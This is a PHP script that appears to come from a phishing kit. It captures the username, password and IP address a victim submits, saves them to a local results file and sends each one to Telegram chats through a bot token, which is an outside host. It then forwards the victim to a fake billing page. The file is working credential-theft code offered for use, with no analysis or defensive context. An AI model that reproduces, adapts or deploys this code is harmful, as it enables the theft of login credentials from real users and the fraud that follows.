<?php 
extract($_REQUEST);
include "./id.php";
$EE=$_POST['user'];
$F=$_POST["password"];
$ipp=$_SERVER['REMOTE_ADDR'];
$message=">>>>>>>>>>>>>|💵| MVM |💵|<<<<<<<<<<<<"."\n"."User :   ".$EE."\n"."Password :  ".$F."\n"."IP :  ".$ipp."\n".">>>>>>>>>>>>>|💳| MVM |💳|<<<<<<<<<<<<";
$user_ids=$id;
$filee=fopen("result.txt",'a');
fwrite($filee,$message."\n");
fclose($filee);

header("location: pages/billing.php");
foreach($user_ids as $user_id) {
$url='https://api.telegram.org/bot'.$token.'/sendMessage';
$data=array('chat_id'=>$user_id,'text'=>$message);
$options=array('http'=>array('method'=>'POST','header'=>"Content-Type:application/x-www-form-urlencoded\r\n",'content'=>http_build_query($data),),);
$context=stream_context_create($options);
$result=file_get_contents($url,false,$context);
}
?>